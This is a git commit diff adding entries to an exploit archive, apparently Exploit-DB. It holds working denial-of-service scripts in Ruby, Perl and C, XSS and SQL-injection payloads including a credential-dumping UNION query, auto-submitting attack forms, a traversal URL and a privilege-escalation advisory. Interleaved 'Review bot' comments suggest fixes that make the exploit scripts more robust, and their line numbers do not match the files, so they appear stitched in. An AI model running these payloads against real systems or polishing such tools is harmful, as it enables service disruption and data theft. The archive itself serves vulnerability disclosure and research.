Updated 07_06_2014

This commit is contained in:
Offensive Security 2014-07-06 04:38:47 +00:00
parent 6c64ec7209
commit b793c8ab94
13 changed files with 784 additions and 0 deletions


@ -30583,5 +30583,17 @@ id,file,description,date,author,platform,type,port
33958,platforms/cgi/webapps/33958.txt,"Digital Factory Publique! 2.3 'sid' Parameter SQL Injection Vulnerability",2010-05-06,"Christophe de la Fuente",cgi,webapps,0
33959,platforms/asp/webapps/33959.txt,"Multiple Consona Products 'n6plugindestructor.asp' Cross Site Scripting Vulnerability",2010-05-07,"Ruben Santamarta ",asp,webapps,0
33960,platforms/php/webapps/33960.txt,"ECShop 2.7.2 'category.php' SQL Injection Vulnerability",2010-05-07,Liscker,php,webapps,0
33961,platforms/windows/local/33961.txt,"Ubisoft Uplay 4.6 - Insecure File Permissions Local Privilege Escalation",2014-07-03,LiquidWorm,windows,local,0
33962,platforms/hardware/remote/33962.txt,"Cisco Application Control Engine (ACE) HTTP Parsing Security Weakness",2010-05-07,"Alexis Tremblay",hardware,remote,0
33963,platforms/linux/local/33963.txt,"gdomap Multiple Local Information Disclosure Vulnerabilities",2010-05-07,"Dan Rosenberg",linux,local,0
33965,platforms/linux/dos/33965.txt,"Geo++ GNCASTER 1.4.0.7 HTTP GET Request Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
33966,platforms/linux/dos/33966.rb,"Geo++ GNCASTER 1.4.0.7 NMEA-data Denial Of Service Vulnerability",2010-01-27,"RedTeam Pentesting GmbH",linux,dos,0
33967,platforms/php/webapps/33967.txt,"Chipmunk Newsletter 2.0 Multiple Cross Site Scripting Vulnerabilities",2010-01-20,b0telh0,php,webapps,0
33968,platforms/windows/dos/33968.pl,"Xitami 5.0 '/AUX' Request Remote Denial Of Service Vulnerability",2010-05-10,"Usman Saeed",windows,dos,0
33969,platforms/php/webapps/33969.txt,"eFront 3.x 'ask_chat.php' SQL Injection Vulnerability",2010-05-09,"Stefan Esser",php,webapps,0
33970,platforms/php/webapps/33970.txt,"EasyPublish CMS 23.04.2010 URI Cross Site Scripting Vulnerability",2010-05-10,"High-Tech Bridge SA",php,webapps,0
33971,platforms/windows/remote/33971.c,"Rebellion Aliens vs Predator 2.22 Multiple Memory Corruption Vulnerabilities",2010-05-07,"Luigi Auriemma",windows,remote,0
33972,platforms/php/webapps/33972.txt,"Advanced Poll 2.0 'mysql_host' Parameter Cross Site Scripting Vulnerability",2010-05-10,"High-Tech Bridge SA",php,webapps,0
33973,platforms/windows/dos/33973.pl,"Hyplay 1.2.0326.1 '.asx' File Remote Denial of Service Vulnerability",2010-05-10,"Steve James",windows,dos,0
33974,platforms/windows/remote/33974.txt,"Mereo 1.9.1 Directory Traversal Vulnerability",2010-05-09,"John Leitch",windows,remote,0
33975,platforms/php/webapps/33975.html,"Affiliate Store Builder 'edit_cms.php' Multiple SQL Injection Vulnerabilities",2010-05-11,"High-Tech Bridge SA",php,webapps,0


9
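--- /dev/null
+++ b/platforms/linux/dos/33965.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/40009/info
+Geo++ GNCASTER is prone to a denial-of-service vulnerability.
+An attacker can exploit this issue to cause the application to crash, resulting in a denial-of-service condition. Arbitrary code-execution may also be possible; this has not been confirmed.
+Geo++ GNCASTER 1.4.0.7 is vulnerable; other versions may also be affected.
+$ curl -i "http://www.example.com:1234/`perl -e 'printf "A"x988'`"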

49
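--- /dev/null
+++ b/platforms/linux/dos/33966.rb
@@ -0,0 +1,49 @@
+source: http://www.securityfocus.com/bid/40015/info
+Geo++ GNCASTER is prone to a denial-of-service vulnerability.
+An attacker with valid login credentials can exploit this issue to cause the application to crash, resulting in a denial-of-service condition. Arbitrary code-execution may also be possible; this has not been confirmed.
+Geo++ GNCASTER 1.4.0.7 is vulnerable; other versions may also be affected.
+-------------------------------------------------------------------
+#!/usr/bin/env ruby
+######################################
+# #
+# RedTeam Pentesting GmbH #
+# kontakt () redteam-pentesting de #
+# http://www.redteam-pentesting.de #
+# #
+######################################
+require 'socket'
+require 'base64'
+if ARGV.length < 3 then
+puts "USAGE: %s host:port user:password stream" % __FILE__
+puts "Example: %s 127.0.0.1:2101 testuser:secret /0001" % __FILE__
+puts
+exit
+end
+host, port = ARGV[0].split(':')
+pw, stream = ARGV[1..2]
+begin
+puts "requesting stream %s" % stream.inspect
+sock = TCPSocket.new(host, port.to_i)
+sock.write("GET %s HTTP/1.1\r\n" % stream)
+sock.write("Authorization: Basic %s\r\n" % Base64.encode64(pw).strip)
+sock.write("\r\n")
+response = sock.readline
+puts "server response: %s" % response.inspect
+puts "sending modified nmea data"
+sock.write("$GP" + "A" * 2000 +
+"GGA,134047.00,5005.40000000,N,00839.60000000," +
+"E,1,05,0.19,+00400,M,47.950,M,,*69\r\n")
+puts "done"
+end
+-------------------------------------------------------------------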
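Review bot: The `begin` block at lines 71–84 has no `rescue` or `ensure` clause, so a refused connection or a peer that drops mid-write surfaces as an uncaught exception and `sock` is never closed. Adding `ensure sock.close if sock` before the closing `end`, or using the block form `TCPSocket.open(host, port.to_i) { |sock| ... }`, releases the descriptor on every path. Separately, `port.to_i` at line 73 yields 0 when `ARGV[0]` carries no `:` part, so a malformed first argument fails inside `TCPSocket.new` instead of at the usage check on line 63.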
-------------------------------------------------------------------

34
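--- /dev/null
+++ b/platforms/php/webapps/33967.txt
@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/40024/info
+Chipmunk Newsletter is prone to multiple cross-site scripting vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+Chipmunk Newsletter 2.0 is vulnerable; other versions may also be affected.
+::[ inurl:admin/login.php "Registering Admin" ]::
+1 - http://localhost/sub.php
+POSTDATA:
+email=<script>alert(&#039;xss&#039;)</script>&choice=sub&lists=1&submit=submit
+2 - http://localhost/admin/addaddress.php
+POSTDATA:
+email=<script>alert(&#039;xss&#039;)</script>&lists=1&submit=submit
+then we can check it...
+http://localhost/admin/searchaddress.php
+POSTDATA:
+theaddress=<script>alert(&#039;xss&#039;)</script>&submit=submit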


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40032/info
eFront is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
eFront 3.6.2 and prior versions are vulnerable.
http://www.example.com/www/ask_chat.php?chatrooms_ID=0%20UNION%20select%20concat%28login,0x2e,password%29,1,1,1,1%20from%20users%20--%20x


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40037/info
EasyPublish CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
EasyPublish CMS 23.04.2010 is vulnerable; other versions may also be affected.
http://www.example.com/?%22%3E%3Cb%3E%3Cscript%3Ex=document;alert%28x.cookie%29%3C/script%3E

18
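--- /dev/null
+++ b/platforms/php/webapps/33972.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/40045/info
+Advanced Poll is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+Advanced Poll 2.08 is vulnerable; other versions may also be affected.
+<form method="POST" action="http://www.example.com/misc/get_admin.php" name="main">
+<input type="hidden" name="mysql_host" value="<script>alert(document.cookie);</script>">
+<input type="hidden" name="db_name" value="X">
+<input type="hidden" name="mysql_user" value="X">
+<input type="hidden" name="mysql_pass" value="X">
+<input type="hidden" name="action" value="connect">
+</form>
+<script>
+document.main.submit();
+</script>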


@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/40058/info
Affiliate Store Builder is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
<form action='http://www.example.com/admin/edit_cms.php?page=1' name="frm" method='post' > <input name="title" type="hidden" value="Home"/> <input name="type" type="hidden" value="header"/> <input name="desc_meta" type="hidden" value="page+desc" /> <input name="desc_key" type="hidden" value='"><script>alert(document.cookie)</script>' /> <input name="cms_id" type="hidden" value="1" /> <input name="edit_page" type="hidden" value="Edit+Page" /> </form> <script> document.frm.submit(); </script>

78
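--- /dev/null
+++ b/platforms/windows/dos/33968.pl
@@ -0,0 +1,78 @@
+source: http://www.securityfocus.com/bid/40027/info
+Xitami is prone to a denial-of-service vulnerability.
+Attackers can exploit this issue to crash the affected application, denying service to legitimate users.
+Xitami 5.0a0 is vulnerable.
+#!/usr/bin/perl
+# Xitami/5.0a0 Denial Of Service
+# Disclaimer:
+# [This code is for Educational Purposes , I would Not be responsible for any misuse of this code]
+# Author: Usman Saeed
+# Company: Xc0re Security Research Group
+# Website: http://www.xc0re.net
+# DATE: [10/05/10]
+$host = $ARGV[0];
+$PORT = $ARGV[1];
+$packet = "AUX";
+$stuff = "GET /".$packet." HTTP/1.0\r\n\r\n";
+use IO::Socket::INET;
+if (! defined $ARGV[0])
+{
+print "+========================================================+\n";
+print "+ Program [Xitami/5.0a0 Denial Of Service] +\n";
+print "+ Author [Usman Saeed] +\n";
+print "+ Company [Xc0re Security Research Group] +\n";
+print "+ DATE: [10/05/10] +\n";
+print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
+print "+ Disclaimer: [This code is for Educational Purposes , +\n";
+print "+ I would Not be responsible for any misuse of this code]+\n";
+print "+========================================================+\n";
+exit;
+}
+$sock = IO::Socket::INET->new( Proto => "tcp",PeerAddr => $host , PeerPort => $PORT) || die "Cant connect to $host!";
+print "+========================================================+\n";
+print "+ Program [Xitami/5.0a0 Denial Of Service] +\n";
+print "+ Author [Usman Saeed] +\n";
+print "+ Company [Xc0re Security Research Group] +\n";
+print "+ DATE: [10/05/10] +\n";
+print "+ Usage :perl sploit.pl webserversip wbsvrport +\n";
+print "+ Disclaimer: [This code is for Educational Purposes , +\n";
+print "+ I would Not be responsible for any misuse of this code]+\n";
+print "+========================================================+\n";
+print "\n";
+print "[*] Initializing\n";
+sleep(2);
+print "[*] Sendin DOS Packet \n";
+send ($sock , $stuff , 0);
+print "[*] Crashed :) \n";
+$res = recv($sock,$response,1024,0);
+print $response;
+exit;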
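Review bot: The nine-line banner printed at lines 178–186 is repeated verbatim at lines 190–198; a single `sub banner { ... }` called from both places keeps the two copies from drifting. The script also runs without `use strict; use warnings;`, which would have flagged the unchecked `send` and `recv` results at lines 203 and 205, and the `die` at line 189 omits `$!`, so the reason a connection failed is lost; `die "Cant connect to $host: $!";` keeps it.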

37
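--- /dev/null
+++ b/platforms/windows/dos/33973.pl
@@ -0,0 +1,37 @@
+source: http://www.securityfocus.com/bid/40048/info
+Hyplay is prone to a remote denial-of-service vulnerability.
+Attackers may leverage this issue to crash the affected application, denying service to legitimate users. Given the nature of this issue, the attacker may also be able to run arbitrary code, but this has not been confirmed.
+Hyplay 1.2.0326.1 is vulnerable; other versions may also be affected.
+#/usr/bin/perl
+#Title: Hyplay 1.2.0326.1 (.asx) Local DoS crash PoC
+#Download: http://www.hyplay.com/download.asp
+#Written/Discovered by: xsploited Security
+#Tested on Windows XP SP2
+#URL: http://x-sploited.com/
+#Shoutz: kAoTiX, drizzle, JeremyBrown, BreTT, Deca
+#A bug exists in the way Hyplay processes malformed .asx play
+#list files. This could potentially lead to code execution on
+#the users machine.
+my $data1=
+"\x3C\x61\x73\x78\x20\x76\x65\x72\x73\x69\x6F\x6E\x20\x3D\x20".
+"\x22\x33\x2E\x30\x22\x20\x3E\x0D\x0D\x0A\x3C\x65\x6E\x74\x72".
+"\x79\x3E\x0D\x0D\x0A".
+"\x3C\x72\x65\x66\x20\x68\x72\x65\x66\x20\x3D\x20\x22";
+my $data2="http://";
+my $data3= #asx file footer
+"\x22\x20\x2F\x3E\x0D\x0A\x3C\x2F\x65\x6E\x74\x72\x79\x3E\x0D".
+"\x0A\x3C\x2F\x61\x73\x78\x3E";
+my $junk = "\x41" x 3000;
+open(my $playlist, "> hyplay_d0s.asx");
+print $playlist $data1.$data2.$junk.$data3."\r\n";
+close $playlist;
+print "\nEvil asx file created successfully.";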
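Review bot: The first line at 218 reads `#/usr/bin/perl` without the `!`, so it is an ordinary comment rather than a shebang and the file is not directly executable; `#!/usr/bin/perl` is intended. The `open` at line 238 is unchecked, so a failure (read-only directory, existing file locked) still falls through to the success message on line 241; `open(my $playlist, '>', 'hyplay_d0s.asx') or die "open: $!";` uses the three-argument form and reports it. The `#asx file footer` comment at line 234 sits between `=` and its value, which parses but reads oddly; moving it to the line above makes the assignment easier to follow.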

142
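--- /dev/null
+++ b/platforms/windows/local/33961.txt
@@ -0,0 +1,142 @@
+?
+Ubisoft Uplay 4.6 Insecure File Permissions Local Privilege Escalation
+Vendor: Ubisoft Entertainment S.A.
+Product web page: http://www.ubi.com
+Affected version: 4.6.3208 (PC)
+4.5.2.3010 (PC)
+Summary: Uplay is a digital distribution, digital rights management,
+multiplayer and communications service created by Ubisoft to provide
+an experience similar to the achievements/trophies offered by various
+other game companies.
+- Uplay PC is a desktop client which replaces individual game launchers
+previously used for Ubisoft games. With Uplay PC, you have all your Uplay
+enabled games and Uplay services in the same place and you get access to
+a whole new set of features for your PC games.
+Desc: Uplay for PC suffers from an elevation of privileges vulnerability
+which can be used by a simple user that can change the executable file
+with a binary of choice. The vulnerability exist due to the improper
+permissions, with the 'F' flag (Full) for 'Everyone' group, making the
+entire directory 'Ubisoft Game Launcher' and its files and sub-dirs
+world-writable.
+Tested on: Microsoft Windows 7 Professional SP1 (EN)
+Microsoft Windows 7 Ultimate SP1 (EN)
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+@zeroscience
+Advisory ID: ZSL-2014-5191
+Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5191.php
+Vendor: http://forums.ubi.com/forumdisplay.php/513-Uplay
+30.05.2014
+--
+=======================================================================
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls *.exe |findstr Everyone
+UbisoftGameLauncher.exe Everyone:(I)(F)
+UbisoftGameLauncher64.exe Everyone:(I)(F)
+Uninstall.exe Everyone:(I)(F)
+Uplay.exe Everyone:(I)(F)
+UplayCrashReporter.exe Everyone:(I)(F)
+UplayService.exe Everyone:(I)(F)
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>
+=======================================================================
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls Uplay.exe
+Uplay.exe Everyone:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Users:(I)(RX)
+Successfully processed 1 files; Failed processing 0 files
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>
+=======================================================================
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>icacls *.exe |findstr (F)
+UbisoftGameLauncher.exe Everyone:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+BUILTIN\Administrators:(I)(F)
+UbisoftGameLauncher64.exe Everyone:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+BUILTIN\Administrators:(I)(F)
+Uninstall.exe Everyone:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+BUILTIN\Administrators:(I)(F)
+Uplay.exe Everyone:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+BUILTIN\Administrators:(I)(F)
+UplayCrashReporter.exe Everyone:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+BUILTIN\Administrators:(I)(F)
+UplayService.exe Everyone:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+BUILTIN\Administrators:(I)(F)
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>
+=======================================================================
+C:\Program Files (x86)\Ubisoft>icacls "Ubisoft Game Launcher"
+Ubisoft Game Launcher Everyone:(OI)(CI)(F)
+NT SERVICE\TrustedInstaller:(I)(F)
+NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+NT AUTHORITY\SYSTEM:(I)(F)
+NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+BUILTIN\Administrators:(I)(F)
+BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+BUILTIN\Users:(I)(RX)
+BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+Successfully processed 1 files; Failed processing 0 files
+C:\Program Files (x86)\Ubisoft>
+=======================================================================
+=======================================================================
+Changed permissions (vendor fix):
+---------------------------------
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>cacls Uplay.exe
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher\Uplay.exe BUILTIN\Users:(ID)(special access:)
+DELETE
+READ_CONTROL
+WRITE_DAC
+WRITE_OWNER
+STANDARD_RIGHTS_REQUIRED
+FILE_READ_DATA
+FILE_WRITE_DATA
+FILE_APPEND_DATA
+FILE_READ_EA
+FILE_WRITE_EA
+FILE_EXECUTE
+NT AUTHORITY\SYSTEM:(ID)F
+BUILTIN\Administrators:(ID)F
+BUILTIN\Users:(ID)R
+labpc\user4dmin:(ID)F
+C:\Program Files (x86)\Ubisoft\Ubisoft Game Launcher>
+=======================================================================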

371
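--- /dev/null
+++ b/platforms/windows/remote/33971.c
@@ -0,0 +1,371 @@
+source: http://www.securityfocus.com/bid/40041/info
+Rebellion Aliens vs Predator is prone to multiple memory-corruption vulnerabilities.
+Successfully exploiting these issues allows remote attackers to cause denial-of-service conditions. Due to the nature of these issues, arbitrary code execution may be possible; this has not been confirmed.
+Aliens vs Predator 2.22 is vulnerable; other versions may also be affected.
+/*
+by Luigi Auriemma
+*/
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+#include <time.h>
+#ifdef WIN32
+#include <winsock.h>
+#include "winerr.h"
+#define close closesocket
+#define sleep Sleep
+#define ONESEC 1000
+#else
+#include <unistd.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <arpa/inet.h>
+#include <netinet/in.h>
+#include <netdb.h>
+#define ONESEC 1
+#define stristr strcasestr
+#define stricmp strcasecmp
+#endif
+typedef uint8_t u8;
+typedef uint16_t u16;
+typedef uint32_t u32;
+#define VER "0.1.1"
+#define PORT 27010
+#define BUFFSZ 0x400 // max size supported by the game
+#define RAND_UNIC \
+putrr(nick, sizeof(nick) - 1, 1); \
+for(x = 0;; x++) { \
+p += putxx(p, nick[x], 16); \
+if(!nick[x]) break; \
+}
+int tcp_sock(struct sockaddr_in *peer);
+int avp3_send(int sd, int type, u8 *data, int len);
+int avp3_recv(int sd, int *type, u8 *data);
+int putrr(u8 *data, int len, int sx);
+int putcc(u8 *data, int chr, int len);
+int putxx(u8 *data, u32 num, int bits);
+int getxx(u8 *data, u32 *ret, int bits);
+int timeout(int sock, int secs);
+u32 resolv(char *host);
+void std_err(void);
+int main(int argc, char *argv[]) {
+struct sockaddr_in peer;
+int sd,
+x,
+len,
+rnd, // id?
+bug,
+type;
+u16 port = PORT;
+u8 buff[BUFFSZ],
+nick[32 + 1],
+*host,
+*p;
+#ifdef WIN32
+WSADATA wsadata;
+WSAStartup(MAKEWORD(1,0), &wsadata);
+#endif
+setbuf(stdout, NULL);
+fputs("\n"
+"Alien vs Predator <= 2.22 multiple vulnerabilities "VER"\n"
+"by Luigi Auriemma\n"
+"e-mail: aluigi@autistici.org\n"
+"web: aluigi.org\n"
+"\n", stdout);
+if(argc < 3) {
+printf("\n"
+"Usage: %s <bug> <host> [port(%hu)]>\n"
+"\n"
+"Bugs:\n"
+" 1 = invalid memory access in packet 0x66\n"
+" 2 = out of memory allocation in packet 0x66\n"
+" 3 = NULL pointer in packet 0x66\n"
+" 4 = NULL pointer in packet 0x0c\n"
+" 5 = invalid memory access in packet 0x0c\n"
+"\n", argv[0], port);
+exit(1);
+}
+bug = atoi(argv[1]);
+host = argv[2];
+if(argc > 3) port = atoi(argv[3]);
+peer.sin_addr.s_addr = resolv(host);
+peer.sin_port = htons(port);
+peer.sin_family = AF_INET;
+printf("- target %s : %hu\n", inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));
+rnd = time(NULL) ^ peer.sin_port ^ peer.sin_addr.s_addr;
+sd = tcp_sock(&peer);
+p = buff;
+p += putxx(p, 0x00002832, 32); // version? (const static)
+p += putxx(p, rnd, 32);
+p += putxx(p, 0x01100001, 32);
+p += putxx(p, -1, 32);
+p += putcc(p, 0, 0x14);
+// the game limits the nickname to 32 chars
+RAND_UNIC
+p += putcc(p, 0, 0xec - (p - buff)); // fixed size
+if(avp3_send(sd, 0xf000, buff, p - buff) < 0) goto quit;
+len = avp3_recv(sd, NULL, buff);
+if(len < 0) goto quit;
+printf("- send malformed packet\n");
+p = buff;
+if(bug == 1) {
+p += putrr(p, 0x20, 0); // encrypted with tea key: "J2Z4163G1W3B1PX4", other hidden string "_PAK9TEHAWESOME_"
+p += putcc(p, 0, 8);
+p += putxx(p, rnd, 32);
+p += putxx(p, 0x01100001, 32);
+p += putxx(p, 0xffff, 32); // high enough to be allocated but bigger than the source buffer
+p += putcc(p, 'a', 0xcc); // 0xcc would be the valid ticket size
+type = 0x66;
+} else if(bug == 2) {
+p += putrr(p, 0x20, 0); // encrypted with tea key: "J2Z4163G1W3B1PX4", other hidden string "_PAK9TEHAWESOME_"
+p += putcc(p, 0, 8);
+p += putxx(p, rnd, 32);
+p += putxx(p, 0x01100001, 32);
+p += putxx(p, 0x6fffffff, 32); // unallocable
+p += putcc(p, 'a', 0xcc); // 0xcc would be the valid ticket size
+type = 0x66;
+} else if(bug == 3) {
+type = 0x66;
+} else if(bug == 4) {
+type = 0x0c;
+} else if(bug == 5) {
+p += putxx(p, 0xf010, 32);
+p += putxx(p, 0xccbd, 32);
+p += putxx(p, 100, 32);
+p += putxx(p, 0x800, 32); // amount of chars that compose the message (0x800 is the max)
+p += putxx(p, rnd, 32);
+p += putxx(p, 0x01100001, 32);
+p += putxx(p, 0x05, 16);
+RAND_UNIC // the message
+p += putxx(p, 0, 32);
+type = 0x0c;
+} else {
+printf("\nError: invalid bug number (%d)\n", bug);
+exit(1);
+}
+// in my tests in some cases is needed to send the packet multiple times
+for(x = 0; x < 5; x++) {
+if(avp3_send(sd, type, buff, p - buff) < 0) goto quit;
+}
+len = avp3_recv(sd, NULL, buff);
+if(len < 0) goto quit;
+close(sd);
+printf("\n- check the server manually for verifying if it's vulnerable or not\n");
+return(0);
+quit:
+printf("\nError: connection interrupted or something else\n");
+exit(1);
+return(0);
+}
+int tcp_sock(struct sockaddr_in *peer) {
+struct linger ling = {1,1};
+int sd;
+sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
+if(sd < 0) std_err();
+if(connect(sd, (struct sockaddr *)peer, sizeof(struct sockaddr_in))
+< 0) std_err();
+setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
+return(sd);
+}
+u32 avp3_crc(u8 *data, int len) {
+u32 crc = 0x9e3779b9;
+int i;
+if(data && len) {
+for(i = 0; i < len; i++) {
+crc = data[i] + ((crc << 5) - crc);
+}
+}
+return(crc);
+}
+int avp3_send(int sd, int type, u8 *data, int len) {
+u8 tmp[8];
+if(len > BUFFSZ) {
+printf("\nError: data too big (0x%x)\n", len);
+exit(1);
+}
+putxx(tmp, type, 16);
+putxx(tmp + 2, len, 16);
+putxx(tmp + 4, avp3_crc(data, len), 32);
+if(send(sd, tmp, 8, 0) != 8) return(-1);
+if(send(sd, data, len, 0) != len) return(-1);
+return(0);
+}
+int tcp_recv(int sd, u8 *buff, int len) {
+int i,
+t;
+for(i = 0; i < len; i += t) {
+if(timeout(sd, 10) < 0) return(-1);
+t = recv(sd, buff + i, len - i, 0);
+if(t <= 0) return(-1);
+}
+return(len);
+}
+int avp3_recv(int sd, int *type, u8 *data) {
+int len,
+crc;
+u8 tmp[8];
+if(tcp_recv(sd, tmp, 8) < 0) return(-1);
+if(type) getxx(tmp, type, 16);
+getxx(tmp + 2, &len, 16);
+getxx(tmp + 4, &crc, 32);
+if(len > BUFFSZ) return(-1);
+if(tcp_recv(sd, data, len) < 0) return(-1);
+return(len);
+}
+int putrr(u8 *data, int len, int sx) {
+static const char table[] =
+"0123456789"
+"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+"abcdefghijklmnopqrstuvwxyz";
+static u32 rnd = 0;
+int i;
+if(!rnd) rnd = ~time(NULL);
+if(sx) {
+len = rnd % len;
+if(len < 3) len = 3;
+}
+for(i = 0; i < len; i++) {
+rnd = ((rnd * 0x343FD) + 0x269EC3) >> 1;
+if(sx) {
+data[i] = table[rnd % (sizeof(table) - 1)];
+} else {
+data[i] = rnd;
+}
+}
+if(sx) data[i] = 0;
+return(i);
+}
+int putcc(u8 *data, int chr, int len) {
+memset(data, chr, len);
+return(len);
+}
+int putxx(u8 *data, u32 num, int bits) {
+int i,
+bytes;
+bytes = bits >> 3;
+for(i = 0; i < bytes; i++) {
+data[i] = (num >> (i << 3));
+}
+return(bytes);
+}
+int getxx(u8 *data, u32 *ret, int bits) {
+u32 num;
+int i,
+bytes;
+bytes = bits >> 3;
+for(num = i = 0; i < bytes; i++) {
+num |= (data[i] << (i << 3));
+}
+*ret = num;
+return(bytes);
+}
+int timeout(int sock, int secs) {
+struct timeval tout;
+fd_set fd_read;
+tout.tv_sec = secs;
+tout.tv_usec = 0;
+FD_ZERO(&fd_read);
+FD_SET(sock, &fd_read);
+if(select(sock + 1, &fd_read, NULL, NULL, &tout)
+<= 0) return(-1);
+return(0);
+}
+u32 resolv(char *host) {
+struct hostent *hp;
+u32 host_ip;
+host_ip = inet_addr(host);
+if(host_ip == INADDR_NONE) {
+hp = gethostbyname(host);
+if(!hp) {
+printf("\nError: Unable to resolv hostname (%s)\n", host);
+exit(1);
+} else host_ip = *(u32 *)hp->h_addr;
+}
+return(host_ip);
+}
+#ifndef WIN32
+void std_err(void) {
+perror("\nError");
+exit(1);
+}
+#endif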
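Review bot: `avp3_recv` at lines 561–572 declares `len` and `crc` as `int` but passes `&len` and `&crc` to `getxx`, whose second parameter is `u32 *` (line 405), and `type` on line 566 is an `int *` passed the same way; that is an incompatible-pointer-types diagnostic and a hard error on recent compilers. Declaring `u32 len, crc;` locally (and reading `type` through a `u32` temporary before storing it) matches the prototype, and the `len > BUFFSZ` guard on line 569 still bounds the read into `data`. The `crc` value is read but never compared against `avp3_crc(data, len)`, so either drop it or document that the receive side deliberately skips the checksum. `resolv` at line 640 type-puns through `*(u32 *)hp->h_addr`; `memcpy(&host_ip, hp->h_addr, sizeof host_ip);` avoids the aliasing and alignment concern, and the `return(0);` after `exit(1);` at line 516 is unreachable and can go.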


@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/40053/info
Mereo is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary local files and directories within the context of the webserver. Information harvested may aid in launching further attacks.
Mereo 1.9.1 is vulnerable; other versions may also be affected.
http://www.example.com/%80../%80../%80../%80../%80../%80../%80../%80../